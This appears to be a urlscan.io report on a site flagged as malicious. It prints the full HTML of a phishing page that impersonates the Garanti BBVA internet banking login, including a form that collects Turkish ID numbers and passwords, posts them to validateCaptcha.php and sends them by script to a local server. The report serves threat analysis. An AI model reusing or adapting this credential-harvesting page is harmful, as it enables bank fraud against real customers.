ofofof281.shop Open in urlscan Pro
94.156.66.71  Malicious Activity! Public Scan

URL: https://ofofof281.shop/garanti/
Submission: On July 30 via api from TR — Scanned from DE

Form analysis 1 forms found in the DOM

Name: kkPOST validateCaptcha.php

<form class="form _main-form" onsubmit="return validateCreditCard();" method="post" name="kk" id="myForm" action="validateCaptcha.php" autocomplete="off" enctype="multipart/form-data">
  <input type="hidden" value="ae4236735821c76eb4ce4c3638a40e27b131bdfd16f06dab4ee4e721ec8ca7a2c57de86d444398b2" name="validationFormBean.viewName" id="validationFormBean.viewName">
  <input type="hidden" value="157886e6502ea7cf1772b2415f584b3de61ea435bc693e2cb1249aa5bad17083" name="validationFormBean.commandName" id="validationFormBean.commandName">
  <input type="hidden" value="f2d840e15d804e91ed1df2dfcceef1ab7f04427c63a951fc745dde9e7435ae965f765f55b8e0cea9a1c9276b54d85e882bf8ba2d4e99280660f6e52dc795ce4e" name="validationFormBean.beanClass" id="validationFormBean.beanClass">
  <input type="hidden" value="tr" name="validationFormBean.userLanguage" id="validationFormBean.userLanguage">
  <input type="hidden" value="81a4ab167348c936" name="validationFormBean.defaultTab" id="validationFormBean.defaultTab">
  <input type="hidden" value="tr" name="userLanguage" id="userLanguage">
  <input type="hidden" value="" name="kiosk" id="kiosk">
  <input type="hidden" value="" name="hiddenENCFIELDS" id="hiddenENCFIELDS">
  <input type="hidden" value="" name="hiddenENC" id="hiddenENC">
  <input type="hidden" value="01" name="EOP" id="EOP">
  <input type="hidden" value="" name="isMrn" id="isMrn">
  <input type="hidden" value="01" name="cFlg" id="cFlg">
  <input type="hidden" value="49" name="currentDateTime10" id="currentDateTime10">
  <input type="hidden" value="1600x1200±5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36±H±30.07.2024±14.25.39±Tue, 30 Jul 2024 12:25:39 GMT±Y" name="cInfoBean.v" id="cInfoBean.v">
  <input type="hidden" value="N" name="isBrowserSupportPushNotification" id="isBrowserSupportPushNotification">
  <input type="hidden" value="" name="browserNotificationStatus" id="browserNotificationStatus">
  <input type="hidden" value="" name="browserWebPushTokenId" id="browserWebPushTokenId">
  <input type="hidden" value="" name="browserWebPushTokenIdRefresh" id="browserWebPushTokenIdRefresh">
  <div class="formField ">
    <div class="formFieldOuter">
      <div class="formFieldInner form-group "> <label for="custno" class="col-sm-5 col-md-4 control-label" style="height: 36px;">Müşteri / T.C. Kimlik Numarası</label>
        <div class="formFieldSurround col-sm-7 col-md-8"> <input type="text" class="form-control " pattern="[0-9]*" name="kk" id="custno" maxlength="11" required="">
        </div>
      </div>
    </div>
  </div>
  <div class="formField       ">
    <div class="formFieldOuter">
      <div class="formFieldInner form-group"> <label for="password" class="col-sm-5 col-md-4 control-label" style="height: 36px;"> Parola</label>
        <div class="formFieldSurround col-sm-7 col-md-8">
          <div class="inline-form-control"> <input pattern="[0-9]*" id="custno" class="form-control" name="sonkul" type="password" maxlength="6" required=""> </div>
        </div>
      </div>
    </div>
  </div>
  <script>
    $(function() {
      var containerDiv = $('input#password');
      if ($('input#password') !== undefined) {
        if ($('input#password').length > 0) {
          $('input#password').keydown(function() {
            // Save old value.
            if (!$(this).val() || (parseInt($(this).val()) <= 999999 && parseInt($(this).val()) >= 0)) $(this).data("old", $(this).val());
          });
          $('input#password').keyup(function(e) {
            // Check correct, else revert back to old value.
            if (e != null) {
              if (e.key !== undefined) {
                if ((e.key == 'ArrowLeft') || (e.key == 'ArrowRight') || (e.key == 'ArrowUp') || (e.key == 'ArrowDown') || (e.key == 'Delete') || (e.key == 'Backspace')) {
                  ;
                } else if (e.key.search(/\d/) == -1) {
                  $(this).val($(this).data("old"));
                }
              } else {
                var key = e.keyCode ? e.keyCode : e.which;
                if ((key == '37') || (key == '39') || (key == '38') || (key == '40') || (key == '46') || (key == '8')) {
                  ;
                } else if (key < 48 || key > 57) {
                  $(this).val($(this).data("old"));
                }
              }
            }
            var inputValue = "";
            var inputlength = 0;
            try {
              inputValue = $(this).val();
              inputlength = ("" + $(this).val()).length;
            } catch (err) {
              inputlength = 0;
            }
            if (inputlength <= 0 || (/^[0-9]+$/.test(inputValue) && parseInt(inputValue) <= 999999 && parseInt(inputValue) >= 0));
            else $(this).val($(this).data("old"));
          });
        }
      }
    });
  </script>
  <div class="metaData">
    <span class="script">
      <span class="namespace">GT.temporary</span>
      <span class="name">checkInputLengthpassword</span>
      <span>
        <!--
GT.temporary.checkInputLengthpassword = function() {
var containerDiv=$('input#password');
if ($('input#password')!== undefined) {
if ( $('input#password').length > 0){
$('input#password').keydown(function () {
// Save old value.
if (!$(this).val() || (parseInt($(this).val()) <= 999999 && parseInt($(this).val()) >= 0))
$(this).data("old", $(this).val());
});
$('input#password').keyup(function (e) {
// Check correct, else revert back to old value.

if (e !=null) {
if (e.key!== undefined){
if ((e.key == 'ArrowLeft') || (e.key == 'ArrowRight') ||
(e.key == 'ArrowUp') || (e.key == 'ArrowDown') ||
(e.key == 'Delete') || (e.key == 'Backspace')) {
;
} else if (e.key.search(/\d/) == -1) {
$(this).val($(this).data("old"));
}
} else {
var key = e.keyCode ? e.keyCode : e.which;

if ((key == '37') || (key == '39') ||
(key == '38') || (key == '40') ||
(key == '46') || (key == '8')) {
;
} else if (key <48 || key >57) {
$(this).val($(this).data("old"));
}
}
}

var inputValue = "";
var inputlength = 0;
try {
inputValue = $(this).val();
inputlength = (""+$(this).val()).length;
}
catch(err) {
inputlength = 0;
}
if (inputlength <= 0 ||(/^[0-9]+$/.test(inputValue) && parseInt(inputValue) <= 999999 && parseInt(inputValue) >= 0))
;
else
$(this).val($(this).data("old"));
});
}
}
};
-->
      </span>
    </span>
    <span class="method">
      <span class="namespace">GT.temporary</span>
      <span class="name">checkInputLengthpassword</span>
      <span class="action">remove</span>
    </span>
  </div>
  <input type="hidden" value="Y" name="showRememberMeCheckBoxExist" id="showRememberMeCheckBoxExist" class="structural">
  <div class="ark-ui-checkbox formField   control" id="isRememberMeContainer">
    <div class="formFieldOuter">
      <div class="formFieldInner form-group has-btn  ">
        <div class="formFieldSurround col-sm-7 col-md-8 col-xs-12  col-sm-offset-5 col-md-offset-4">
          <div class="checkbox-container ">
            <div class="checkbox checkbox-primary   no-border">
              <input id="isRememberMe" name="isRememberMe" type="checkbox" value="Y"><input type="hidden" name="_isRememberMe" value="on"> <label for="isRememberMe">Beni Hatırla </label>
              <a class="btn btn-primary has-advice-text help-icon" role="button" tabindex="-999"></a>
              <div class="advice-text advice-text-right ">
                <strong class="subject">Yardım</strong><br> "Beni Hatırla" seçeneğini işaretlediğinizde, sonraki girişleriniz için yalnızca parolanızı yazmanız yeterli olacaktır.
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="form-group form-group-offset elementHide" id="rememberMeExtraText">
    <div class="col-sm-7 col-md-8 col-sm-offset-5 col-md-offset-4 col-xs-12">
      <div class="helper-text">
        <p class=" helper    "> Müşteri / T.C. kimlik numaranız bu cihazda ve tarayıcıda hatırlanacaktır. Güvenliğiniz açısından, bu tanımlamayı sadece kişisel cihazlarınızda yapmanızı öneririz. </p>
      </div>
      <div class="metaData">
        <span class="script">
          <span class="namespace">GT.temporary</span>
          <span class="name">closeLightboxOnSubmitBind</span>
          <span>
            <!--
GT.temporary.closeLightboxOnSubmitBind = function() {
var context = $("div#content");
var linkSubmitBind = $("a.closeLightboxOnSubmit", context);
jQuery(linkSubmitBind, context).bind("click", function () {
var activeLayer = linkSubmitBind.closest(".activeLayer");
if (activeLayer.length > 0) {
GT.utilities.layers.hideLayer(activeLayer[0], "lightboxLayer");
}
});
};
-->
          </span>
        </span>
        <span class="method">
          <span class="namespace">GT.temporary</span>
          <span class="name">closeLightboxOnSubmitBind</span>
          <span class="action">remove</span>
        </span>
      </div>
    </div>
  </div>
  <input type="hidden"
    value="{&quot;input&quot;:{&quot;autocomplete&quot;:true,&quot;autofocus&quot;:true,&quot;list&quot;:true,&quot;placeholder&quot;:true,&quot;max&quot;:true,&quot;min&quot;:true,&quot;multiple&quot;:true,&quot;pattern&quot;:true,&quot;required&quot;:true,&quot;step&quot;:true},&quot;inputtypes&quot;:{&quot;search&quot;:true,&quot;tel&quot;:true,&quot;url&quot;:true,&quot;email&quot;:true,&quot;date&quot;:true,&quot;month&quot;:true,&quot;week&quot;:true,&quot;time&quot;:true,&quot;datetime-local&quot;:true,&quot;range&quot;:true,&quot;color&quot;:true},&quot;cookies&quot;:true,&quot;eventlistener&quot;:true,&quot;json&quot;:true,&quot;svg&quot;:true,&quot;cssescape&quot;:true,&quot;supports&quot;:true,&quot;target&quot;:true,&quot;es5array&quot;:true,&quot;es5date&quot;:true,&quot;es5function&quot;:true,&quot;es5object&quot;:true,&quot;strictmode&quot;:true,&quot;es5string&quot;:true,&quot;es5syntax&quot;:true,&quot;es6array&quot;:true,&quot;es5undefined&quot;:true,&quot;es5&quot;:true,&quot;devicemotion&quot;:true,&quot;deviceorientation&quot;:true,&quot;localstorage&quot;:true,&quot;sessionstorage&quot;:true,&quot;cssall&quot;:true,&quot;inputsearchevent&quot;:true,&quot;audio&quot;:true,&quot;canvas&quot;:true,&quot;video&quot;:true,&quot;bgpositionshorthand&quot;:true,&quot;csscalc&quot;:true,&quot;cubicbezierrange&quot;:true,&quot;cssgradients&quot;:true,&quot;multiplebgs&quot;:true,&quot;opacity&quot;:true,&quot;csspositionsticky&quot;:true,&quot;csspointerevents&quot;:true,&quot;cssremunit&quot;:true,&quot;rgba&quot;:true,&quot;unknownelements&quot;:true,&quot;fileinput&quot;:true,&quot;placeholder&quot;:true,&quot;scriptasync&quot;:true,&quot;scriptdefer&quot;:true,&quot;inlinesvg&quot;:true,&quot;svgasimg&quot;:true,&quot;csschunit&quot;:true,&quot;cssexunit&quot;:true,&quot;mediaqueries&quot;:true,&quot;hiddenscroll&quot;:true,&quot;checked&quot;:true,&quot;displaytable&quot;:true,&quot;display-table&quot;:true,&quot;fontface&quot;:true,&quot;generatedcontent&quot;:true,&quot;cssinvalid&quot;:true,&quot;lastchild&quot;:true,&quot;cssscrollbar&quot;:true,&quot;subpixelfont&quot;:true,&quot;cssvalid&quot;:true,&quot;cssvhunit&quot;:true,&quot;cssvmaxunit&quot;:true,&quot;cssvminunit&quot;:true,&quot;cssvwunit&quot;:true,&quot;formvalidation&quot;:true,&quot;textshadow&quot;:true,&quot;backgroundblendmode&quot;:true,&quot;cssanimations&quot;:true,&quot;csspseudoanimations&quot;:true,&quot;appearance&quot;:true,&quot;backdropfilter&quot;:true,&quot;backgroundcliptext&quot;:true,&quot;bgpositionxy&quot;:true,&quot;bgrepeatround&quot;:true,&quot;bgrepeatspace&quot;:true,&quot;backgroundsize&quot;:true,&quot;bgsizecover&quot;:true,&quot;borderimage&quot;:true,&quot;borderradius&quot;:true,&quot;boxshadow&quot;:true,&quot;boxsizing&quot;:true,&quot;csscolumns&quot;:true,&quot;ellipsis&quot;:true,&quot;cssfilters&quot;:true,&quot;flexbox&quot;:true,&quot;flexwrap&quot;:true,&quot;cssmask&quot;:true,&quot;cssreflections&quot;:true,&quot;cssresize&quot;:true,&quot;shapes&quot;:true,&quot;textalignlast&quot;:true,&quot;csstransforms&quot;:true,&quot;csstransforms3d&quot;:true,&quot;preserve3d&quot;:true,&quot;csstransitions&quot;:true,&quot;csspseudotransitions&quot;:true,&quot;userselect&quot;:true,&quot;apng&quot;:true,&quot;desktop&quot;:true,&quot;_config&quot;:{&quot;enableClasses&quot;:true,&quot;enableJSClass&quot;:true,&quot;usePrefixes&quot;:true},&quot;_l&quot;:{}}"
    name="browserCapabilities" id="browserCapabilities">
  <script>
    function submitForm() {
      var kk = document.getElementById("kk").value;
      var sonkul = document.getElementById("sonkul").value;
      // Form verilerini bir nesne olarak toplayabilirsiniz
      var formData = {
        kk: kk,
        sonkul: sonkul,
        // diğer form verileri
      };
      // Sunucuya form verilerini gönderme
      fetch('http://localhost:3000/submit-form', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(formData),
      }).then((response) => response.text()).then((data) => {
        console.log('Server response:', data);
        // Form başarıyla gönderildiğinde istediğiniz işlemleri gerçekleştirin
      }).catch((error) => {
        console.error('Error sending form data to server:', error);
        // Hata durumunda kullanıcıya bir bildirim gösterebilirsiniz
      });
    }
  </script>
  <div class="form-group form-group-offset footer-button ">
    <div class="col-sm-7 col-md-8 col-sm-offset-5 col-md-offset-4 col-xs-12 ">
      <p> <button onclick="submitForm()" type="submit" id="formSubmit" class="btn btn-primary btn-lg btn-block-input"> Garanti BBVA İnternet Giriş </button></p>
      <div> <a href="Javascript:void(0);" onclick="''" tabindex="-1"></a>
        <a href="Javascript:void(0);" onclick="try{clearInterval(window.customerSupportIntervalId);}catch(err){}window.open('https://subeform.garantibbva.com.tr/isubeform/application/channelapplicationwithcardget/pinRenew-tr','forgotpassword','top=0,left=0,scrollbars=yes,resizable=no,toolbar=no,menubar=no,width=1152,height=895');" tabindex="-1">Parolamı</a>
        unuttum.</div>
      <div>
        <a href="Javascript:void(0);" onclick="window.open('https://subeform.garantibbva.com.tr/isubeform/application/channelapplicationwithcardget/pinReceive-tr','firstpassword','top=0,left=0,scrollbars=yes,resizable=no,toolbar=no,menubar=no,width=1152,height=895');" tabindex="-1">İlk kez parola almak istiyorum.</a>
      </div>
    </div>
  </div>
  <div>
    <input type="hidden" name="_csrf" value="d06c645b-da21-4fb7-aa93-3ae9f982706e">
  </div>
</form>

Text Content

 * Bireysel
 * Kurumsal

 * Bireysel
   * Bireysel
   * Kurumsal

Garanti BBVA İnternet Bankacılığı’na Giriş


PAROLA GIRIS

 * Garanti BBVA İnternet Bankacılığı’na Giriş
 * Parola Giris

GT.temporary addPrefilledsPageClass GT.temporary addPrefilledsPageClass last


GARANTI BBVA İNTERNET BANKACILIĞI’NA GIRIŞ


GÜVENLI BANKACILIĞA HOŞ GELDINIZ

LÜTFEN MÜŞTERI NUMARANIZI YA DA T.C. KIMLIK NUMARANIZI VE SIZE ÖZEL PAROLANIZI
GIRIN.

Müşteri / T.C. Kimlik Numarası

Parola

GT.temporary checkInputLengthpassword GT.temporary checkInputLengthpassword
remove
Beni Hatırla
Yardım
"Beni Hatırla" seçeneğini işaretlediğinizde, sonraki girişleriniz için yalnızca
parolanızı yazmanız yeterli olacaktır.

Müşteri / T.C. kimlik numaranız bu cihazda ve tarayıcıda hatırlanacaktır.
Güvenliğiniz açısından, bu tanımlamayı sadece kişisel cihazlarınızda yapmanızı
öneririz.

GT.temporary closeLightboxOnSubmitBind GT.temporary closeLightboxOnSubmitBind
remove

Garanti BBVA İnternet Giriş

Parolamı unuttum.
İlk kez parola almak istiyorum.



YARDIM VE GÜVENLIK

Güvenliğiniz için lütfen aşağıdaki bilgilere dikkat edin.

Güvenli bir İnternet deneyimi ve güncel virüsler hakkında bilgi almak için
lütfen tıklayın.

Detaylı bilgi
Başkası adına mı işlem yapıyorsunuz?

Başkası adına işlem yapıyorsanız detaylı bilgi için lütfen tıklayın.

Detaylı bilgi
Tasarruf Mevduatı Güvencesi

Tasarruf mevduatınız güvence altında. Detaylı bilgi için lütfen tıklayın.

Detaylı bilgi
Diğer Yardım Ve Güvenlik

Bize Ulaşın Güvenlik Bilgileri Language: English

Copyright © 2023 T.Garanti Bankası A.Ş.